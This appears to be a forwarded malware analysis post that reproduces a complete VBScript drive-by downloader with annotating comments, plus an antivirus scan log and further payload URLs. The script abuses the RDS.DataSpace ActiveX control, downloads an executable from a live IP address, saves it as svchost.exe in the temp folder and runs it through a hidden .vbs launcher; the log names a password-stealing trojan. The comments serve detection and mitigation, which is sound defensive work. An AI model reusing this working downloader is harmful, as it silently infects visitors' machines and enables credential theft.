转一个分析报告
<SCRIPT language=VBScript>
' Captured drive-by downloader sample, annotated for analysis; the code lines are unchanged.
' Flow as written: fetch a remote executable over HTTP, save it to the temp folder,
' write a small .vbs launcher next to it, then run the launcher with a hidden window.
' Most object names and verbs are split into string fragments joined with "&",
' presumably to defeat plain substring signatures; join the fragments before matching.

' Suppress all runtime errors so a failure at any step stays silent to the visitor.
on error resume next
' Payload location (network indicator). The scan log further down this page reports a
' file named server.exe as Downloader.Small.Die - presumably the same file; confirm by hash.
fuckie = "http://210.51.184.238:8080/images/server.exe"
' Drop names. svchost.exe is also the name of a legitimate Windows process, so a copy
' of that name under the temp folder is a useful hunting indicator.
fname1="svchost.exe"
fname2="svchost.vbs"
' Create an <object> element and point it at CLSID BD96C556-65A3-11D0-983A-00C04FC29E36
' (the RDS.DataSpace ActiveX control). Every later object is created through this
' element's CreateObject method rather than the script engine's own CreateObject.
' Mitigation: patch the control or set its kill bit so the browser cannot instantiate it.
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"B"&"D"&"96"&"C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
' Resolves to "Microsoft.XMLHTTP": the HTTP client used for the download.
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
Set x = df.CreateObject(str,"")
' a1..a4 are never read in the visible script (str5 below is built from literals),
' so they look like leftovers or filler.
a1="A"&"d"&"o"
a2="d"&"b."
a3="S"&"tr"
a4="e"&"am"
' Resolves to "Adodb.Stream": used to write the response bytes to disk.
str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
set S = df.createobject(str5,"")
' Stream type 1 = binary.
S.type = 1
' Synchronous GET (third argument False): the script blocks until the body has arrived.
str6="G"&"E"&"T"
x.Open str6, fuckie, False
x.Send
' FileSystemObject; GetSpecialFolder(2) returns the temporary folder.
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
' fname1 becomes <temp>\svchost.exe.
fname1= F.BuildPath(tmp,fname1)
' Write the raw response body to that path; save option 2 overwrites an existing file.
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
' fname2 becomes <temp>\svchost.vbs; opened for writing (2) and created if missing (True).
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
' Launcher line 1: creates Shell.Application, again with the name split into fragments.
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
' Launcher line 2 (the variable is named sql but holds VBScript, not SQL):
' ShellExecute on the dropped executable with verb "open" and window style 0 (hidden).
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
' Continue only if both files exist on disk. Because errors are suppressed above,
' this is the script's only check that the download and the write succeeded.
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
' Resolves to "Shell.Application".
d3="She"&"ll."&"App"&"li"&"ca"&"tion"
set Q = df.createobject(d3,"")
dc="o"&"p"&"e"&"n"
' Run the .vbs launcher with window style 0 (hidden); the launcher then starts the
' executable. Detection: a browser process writing an .exe and a .vbs to the temp
' folder, followed by a script host started from that folder.
Q.ShellExecute fname2,"","",dc,0
end if
End if
</SCRIPT>
<script language="javascript" src="http://count20.51yes.com/click.aspx?id=208338993&logo=12"></script>
##### Configuration
# Heuristic level : 4
# Archives scanning with no limit
# Embedded files scanning enabled
# Dialers detection enabled
# Spyware detection enabled
#
##### Statistic
# Objects scanned :
# f:\server.exe
# Files scanned : 1
# Archives scanned : 0 Files in archives : 0
# Embedded files scanned : 0
# Number of infected files : 1 Infected files left : 1
# Cleaned : 0
# Renamed : 0
# Deleted : 0
# Quarantined : 0
# Scanning time : 00:00:08
#
##### Notice
#
2;1;0;1;2007-03-24 16:04:23;Warning;ArcaScan;;102;f:\server.exe;Downloader.Small.Die;NO ACTION;;;
/src = "http://210.51.184.238:8080/images/1.exe"
/src = "http://210.51.184.238:8080/images/2.exe"
/src = "http://210.51.184.238:8080/images/3.exe"
/src = "http://210.51.184.238:8080/images/4.exe"
f:\3.exe
Znaleziono:
Trojan.Psw.Qqrob.Km |